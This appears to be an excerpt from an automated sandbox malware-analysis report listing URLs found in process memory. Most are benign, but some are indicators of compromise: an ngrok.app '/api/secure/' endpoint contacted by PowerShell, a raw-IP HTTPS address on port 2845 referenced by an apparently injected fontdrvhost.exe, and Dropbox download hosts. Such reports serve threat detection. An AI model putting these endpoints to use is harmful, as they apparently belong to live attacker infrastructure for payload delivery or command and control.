                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                      Source: msedge.exe, 00000005.00000003.2316440045.000009BC0039C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                      Source: svchost.exe, 00000006.00000002.3353815451.00000172BE200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                      Source: svchost.exe, 00000006.00000003.2314733738.00000172BE440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD454DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: powershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD449D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D20E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                      Source: 1718218388.exe, 1718218388.exe, 0000001C.00000000.2702359838.0000000000628000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.macromedia.com
                      Source: 1718218388.exe, 0000001B.00000002.2753649067.0000000002550000.00000004.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001B.00000000.2531449583.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
                      Source: powershell.exe, 00000003.00000002.2486546625.000001DD5CE0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: powershell.exe, 00000003.00000002.2486546625.000001DD5CE0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: fontdrvhost.exeString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4
                      Source: fontdrvhost.exe, 0000001D.00000002.2846029464.0000000005244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/h4qwbjtf.qjde4kernelbasentdllkernel32GetProcessMitigatio
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD45166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2482586387.000001DD5CAD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407651705.000001DD44680000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2406948131.000001DD42A5C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2483392374.000001DD5CB3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a
                      Source: powershell.exe, 00000003.00000002.2406948131.000001DD429E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407498129.000001DD42D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2482586387.000001DD5CAD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407651705.000001DD44680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a-UseBa
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD449D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D211D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD466FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD45B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD46946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD45E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD4696C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD46946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                      Source: msedge.exe, 00000005.00000002.2397637903.00000212D1EAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com963
                      Source: msedge.exe, 00000016.00000002.2492066893.00000206402A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comhges
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                      Source: msedge.exe, 00000005.00000002.2401220812.000009BC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreI
                      Source: msedge.exe, 00000005.00000002.2401220812.000009BC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 00000005.00000002.2401246683.000009BC00024000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2503950688.000049D004440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: fontdrvhost.exe, 0000001D.00000003.2761130419.0000000005241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: fontdrvhost.exe, 0000001D.00000003.2761130419.0000000005241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: powershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
